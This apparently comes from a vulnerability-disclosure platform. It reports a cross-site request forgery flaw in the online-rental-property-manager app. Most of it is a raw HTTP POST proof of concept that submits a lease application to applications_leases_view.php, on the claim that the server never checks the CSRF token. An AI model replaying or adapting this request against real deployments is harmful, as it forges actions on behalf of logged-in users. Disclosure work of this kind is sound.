Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager
Valid
Reported on
Aug 4th 2021
✍️ Description
CSRF bug in application
🕵️♂️ Proof of Concept
Bellow request is vulnerable to csrf attack .
Although there is csrf token in request but it does not checked in server-side . Any attacker provided csrf token is accepted here.
POST /online-rental/app/applications_leases_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------216599666334118809003157769131
Content-Length: 4431
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/applications_leases_view.php
Cookie:
Upgrade-Insecure-Requests: 1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="csrf_token"
5d62bcb310fa995fc05c34fdf04f4312
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="current_view"
DV
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SortField"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SelectedID"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SelectedField"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SortDirection"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="FirstRecord"
1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="NoDV"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="PrintDV"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="tenants"
1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="status"
Application
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="property"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="unit"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="type"
Fixed
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="total_number_of_occupants"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="start_dateMonth"
7
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="start_dateDay"
5
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="start_dateYear"
2021
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="end_dateMonth"
7
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="end_dateDay"
5
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="end_dateYear"
2021
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="recurring_charges_frequency"
Monthly
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="next_due_dateMonth"
7
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="next_due_dateDay"
5
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="next_due_dateYear"
2021
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="rent"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit_dateMonth"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit_dateDay"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="security_deposit_dateYear"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="emergency_contact"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="co_signer_details"
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="notes"
<br>
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="insert_x"
1
-----------------------------216599666334118809003157769131
Content-Disposition: form-data; name="SearchString"
-----------------------------216599666334118809003157769131--
💥 Impact
csrf bug
We have contacted a member of the
bigprof-software/online-rental-property-manager
team and are waiting to hear back
2 years ago
to join this conversation